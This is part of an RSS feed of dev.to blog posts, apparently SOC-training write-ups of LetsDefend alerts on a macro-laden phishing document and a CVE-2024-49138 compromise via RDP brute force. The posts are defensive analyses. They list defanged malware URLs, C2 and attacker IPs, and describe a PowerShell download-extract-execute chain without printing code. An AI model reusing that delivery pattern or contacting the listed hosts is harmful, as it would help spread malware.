&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9jzri3vi87dpumxmgj6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9jzri3vi87dpumxmgj6.png" alt="Imption" width="735" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;True positive alert, malicious HTTP traffic detected and successful on our internal server. Escalation to Tier 2 needed for deeper investigation and forensics&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC205 - Malicious Macro has been executed</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Fri, 24 Apr 2026 12:49:55 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc205-malicious-macro-has-been-executed-322p</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc205-malicious-macro-has-been-executed-322p</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0cypxj8652jzgx10sjpg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0cypxj8652jzgx10sjpg.png" alt="alert description" width="800" height="279"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the alert we see which is a "Medium" severity alert.&lt;/p&gt;

&lt;p&gt;We start with taking the ownership of the alert and start to investigate it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbm31zbt703atvnk8ukzw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbm31zbt703atvnk8ukzw.png" alt="create case" width="800" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we go ahead to the investigation channel and create the case &lt;br&gt;
for this investigation&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiwetdymdbw2gqol0ch72.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiwetdymdbw2gqol0ch72.png" alt="investigation case" width="800" height="547"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step for us is to start the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wj211e87uz3fx4fo4ie.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wj211e87uz3fx4fo4ie.png" alt="start playbook" width="800" height="278"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We look up the file hash on VirusTotal and here is what we find:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy60pn8gn6zw3hs0dpmpt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy60pn8gn6zw3hs0dpmpt.png" alt="virustotal" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can conclude that the file is malicious since 31 out of 67 vendors have flagged it malicious.&lt;/p&gt;

&lt;p&gt;After searching the IP on Log Management tab, we find the following information:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;At 8:41 a file named &lt;code&gt;C:\Users\LetsDefend\Downloads\edit1-invoice.docm.zip&lt;/code&gt; has been created (EventID 11 - File Created)&lt;/li&gt;
&lt;li&gt; User opens the Document and a macro code executes PowerShell command and execute the download of the remote ressource(&lt;code&gt;messbox.exe&lt;/code&gt; and save it as &lt;code&gt;mess.exe&lt;/code&gt;) at hxxp[:]//www[.]greyhathacker[.]net/tools/messbox[.]exe&lt;/li&gt;
&lt;li&gt;PowerShell caused a DNS lookup for the C2 host (92[.]204[.]221[.]16)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz88u72truwggxc81msrx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz88u72truwggxc81msrx.png" alt="Imageemail" width="800" height="229"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We search for the file name on the Email Security tab and find an email that was used to deliver this file to Jayne&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fetjkexkn5fsbyb3pp1q0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fetjkexkn5fsbyb3pp1q0.png" alt="Imeail" width="800" height="418"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight email"&gt;&lt;code&gt;&lt;span class="nt"&gt;From&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; jake.admin@cybercommunity.info&lt;/span&gt;
&lt;span class="nt"&gt;To&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; jayne@letsdefend.io&lt;/span&gt;
&lt;span class="nt"&gt;Subject&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; February Membership Fee&lt;/span&gt;
&lt;span class="nt"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Feb, 28, 2024, 08:12 AM&lt;/span&gt;
&lt;span class="nt"&gt;Action&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Allowed&lt;/span&gt;

Attachment: edit1-invoice.docm.zip
Password: infected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since we know that the file is malicious and was executed on the host Jayne, we need to contain that host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ufi2do1u090v7dggxng.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ufi2do1u090v7dggxng.png" alt="contained" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Host is successfully contained.&lt;/p&gt;

&lt;p&gt;Defined threat indicator: Other&lt;br&gt;
Check if the malware is quarantined/cleaned: Not quarantined&lt;br&gt;
The malware is: malicious&lt;br&gt;
C2: accessed&lt;br&gt;
Containment is done.&lt;/p&gt;

&lt;p&gt;Artifacts added:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkiatacsthmxsc2mt2oq1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkiatacsthmxsc2mt2oq1.png" alt="artifacts" width="800" height="609"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Analyst's note added:&lt;/p&gt;

&lt;p&gt;`&lt;br&gt;
On February 28, 2024, at 08:42 AM, a user on host Jayne (IP: 172.16.17.198) opened a malicious macro-enabled Word document named edit1-invoice.docm. The embedded macro executed a PowerShell command that attempted to download a remote executable from www[.]greyhathacker[.]net (92.204.221[.]16). This activity was logged by Sysmon and other endpoint telemetry, including DNS queries and script block execution.&lt;/p&gt;

&lt;p&gt;Earlier, at 08:12 AM, a phishing email originating from jake.admin[@]cybercommunity[.]info was sent to Jayne, containing the malicious document.&lt;/p&gt;

&lt;p&gt;This incident is classified as high severity, as it enabled the download and potential execution of malware. Immediate containment measures included isolating the affected host, preserving relevant artifacts, and defanging the IOCs for safe reporting.&lt;br&gt;
`&lt;/p&gt;

&lt;p&gt;PLaybook is now completed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkq1j2vb17mz6ns2xf9e4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkq1j2vb17mz6ns2xf9e4.png" alt="completedplaybook" width="785" height="501"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we close the alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1m2hsvs00vg8yqn5jd1v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1m2hsvs00vg8yqn5jd1v.png" alt="closeddescription" width="748" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>discuss</category>
      <category>cybersecurity</category>
      <category>socanalysis</category>
    </item>
    <item>
      <title>Letsdefend SOC335 - CVE-2024-49138 Exploitation Detected</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Tue, 21 Apr 2026 19:06:07 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc335-cve-2024-49138-exploitation-detected-3773</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc335-cve-2024-49138-exploitation-detected-3773</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsei1s4tiu9v7dr1fmguf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsei1s4tiu9v7dr1fmguf.png" alt="Take ownership" width="800" height="444"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Take ownership of the alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg900kgljg1gufygqfmas.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg900kgljg1gufygqfmas.png" alt="Create case" width="800" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Create case&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3h2he8uko5qs0sr2y2oj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3h2he8uko5qs0sr2y2oj.png" alt="information" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is a malicious process named &lt;code&gt;svohost.exe&lt;/code&gt; which is named close to &lt;code&gt;svchost.exe&lt;/code&gt;. Svchost.exe (Service Host) is an essential Windows system process that loads and manages multiple background services (DLL-based) to save system resources and improve stability.&lt;/p&gt;

&lt;p&gt;Weird name for the process user &lt;br&gt;
&lt;code&gt;EC2AMAZ-ILGVOIN\LetsDefend&lt;/code&gt; enough to spark doubt and take the alert seriously.&lt;/p&gt;

&lt;p&gt;Looking at the file hash, I decided to search for it on Virustotal.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftrfk8ial9oi73j5balv6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftrfk8ial9oi73j5balv6.png" alt="virustotal" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;50 out of 72 vendors flag this file as malicious on Virustotal&lt;/p&gt;

&lt;p&gt;Moving onto Endpoint security:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxn28pulviqzd5j6hhthk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxn28pulviqzd5j6hhthk.png" alt="code" width="800" height="539"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This PowerShell script downloads a password-protected ZIP file (&lt;code&gt;service-installer.zip&lt;/code&gt;) from a remote S3 bucket to &lt;code&gt;C:\temp&lt;/code&gt;, then uses 7-Zip to extract the archive with the password &lt;code&gt;infected&lt;/code&gt; into the same directory. After extraction, it deletes the original ZIP file and executes &lt;code&gt;svohost.exe&lt;/code&gt; from the extracted &lt;code&gt;service_installer&lt;/code&gt; folder. This behavior is highly indicative of malware delivery and execution, as it retrieves a payload from an external source, extracts it using a hardcoded password (often used to evade static scanning), and launches an executable with a name (&lt;code&gt;svohost.exe&lt;/code&gt;) that mimics a legitimate Windows process (&lt;code&gt;svchost.exe&lt;/code&gt;) to avoid detection.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqbao18k3pr989jh9iwq3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqbao18k3pr989jh9iwq3.png" alt="svohost.exe information" width="800" height="415"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the information from &lt;code&gt;svohost.exe&lt;/code&gt; on the endpoint "Victor"&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F61sl4hh7srqseddbxqmk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F61sl4hh7srqseddbxqmk.png" alt="affected" width="800" height="472"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When I search for the affected host's (Victor) IP in Log Management, and run through the logs, I find there have been multiple failed logon attempts targeting the destination's RDP port (port 3389).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EventID 4625 (failed logon)&lt;/li&gt;
&lt;li&gt;Error code 0xC000006D (bad username or password)&lt;/li&gt;
&lt;li&gt;Attempts for accounts like "admin" and "guest"&lt;/li&gt;
&lt;li&gt;Source IP: 185[.]107[.]56[.]141&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For successful logon:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EventID 4624 (successful logon)&lt;/li&gt;
&lt;li&gt;Logon Type 10 (RemoteInteractive) (typically RDP)&lt;/li&gt;
&lt;li&gt;Username: Victor&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Next, I search for the source IP 185[.]107[.]56[.]141 in Threat Intel on Letsdefend, and the IP is tagged "Brute Force"&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6s7vzd3du1e0d593adao.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6s7vzd3du1e0d593adao.png" alt="Brute Force" width="800" height="417"&gt;&lt;/a&gt;&lt;br&gt;
a strong confirmation that the activity was malicious.&lt;/p&gt;

&lt;p&gt;EventID: 313&lt;br&gt;
Event Time: Jan 22, 2025, 02:37 AM&lt;br&gt;
Rule: SOC335 — CVE-2024–49138 Exploitation Detected&lt;br&gt;
Alert category: True Positive&lt;/p&gt;

&lt;p&gt;For answering the questions of the playbook&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhgmc9cs8ud0gqopldbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhgmc9cs8ud0gqopldbi.png" alt="playbookq1" width="800" height="370"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I pick the first option because of the command we saw that downloads a malicious file from a remote S3 bucket and then executes &lt;code&gt;svohost.exe&lt;/code&gt;. Such behavior is a red flag for outbound connections to Command and Control (C2) infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fayfeu2wajblgclpf43yw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fayfeu2wajblgclpf43yw.png" alt="malwarequaratined" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The malware was allowed and not quarantined or cleaned up.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7hwjbgdep8pi29zf3htd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7hwjbgdep8pi29zf3htd.png" alt="malwareanalyze" width="800" height="438"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we move ahead with analyzing the malware. From the Virustotal scan, we know it is malicious.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F82l979jwugu1exj8fup6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F82l979jwugu1exj8fup6.png" alt="c2requested" width="800" height="445"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In Log Management, the suspicious IP (185.107.56.141) appears in events targeting the host (172.16.17.207) and is also tied to remote access activity, so the malicious address was observed in logs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidxmp2d4gt1269usmi6j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidxmp2d4gt1269usmi6j.png" alt="containit" width="800" height="404"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, we move ahead with containing the affected host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhba42okxbgeg08xnipe1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhba42okxbgeg08xnipe1.png" alt="contained" width="800" height="440"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5yq3kn7bypxwl4nzstd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5yq3kn7bypxwl4nzstd.png" alt="Artifacts" width="800" height="528"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Adding the artifacts, the malicious sender IP, the MD5 hash of the malicious file (from Virustotal), and the malicious code snippet that was running on the terminal.&lt;/p&gt;

&lt;p&gt;Analyst's notes:&lt;br&gt;
I have determined this alert to be a True Positive, as the host Victor (172.16.17.207) executed a suspicious look-alike binary, &lt;code&gt;svohost.exe&lt;/code&gt;, from &lt;code&gt;C:\temp\service_installer\&lt;/code&gt; under an unusual user context with &lt;code&gt;powershell.exe&lt;/code&gt; as its parent, and the file hash is tagged in Threat Intel with CVE-2024-49138. Log Management reveals that the source IP &lt;code&gt;185.107.56.141&lt;/code&gt; repeatedly targeted the host over RDP (port 3389), with Windows security events showing multiple failed logons (4625 / 0xC000006D) followed by a successful remote logon (4624, Logon Type 10) from the same IP, indicating a successful brute force attack—further supported by Threat Intel flagging the IP as "Brute Force." Since the device action was logged as "Allowed," real-world containment would require immediate isolation of the endpoint, blocking the malicious IP, quarantining &lt;code&gt;svohost.exe&lt;/code&gt;, and resetting compromised credentials.&lt;/p&gt;

</description>
      <category>soc</category>
      <category>cybersecurity</category>
      <category>letsdefend</category>
      <category>securityanalysis</category>
    </item>
  </channel>
</rss>
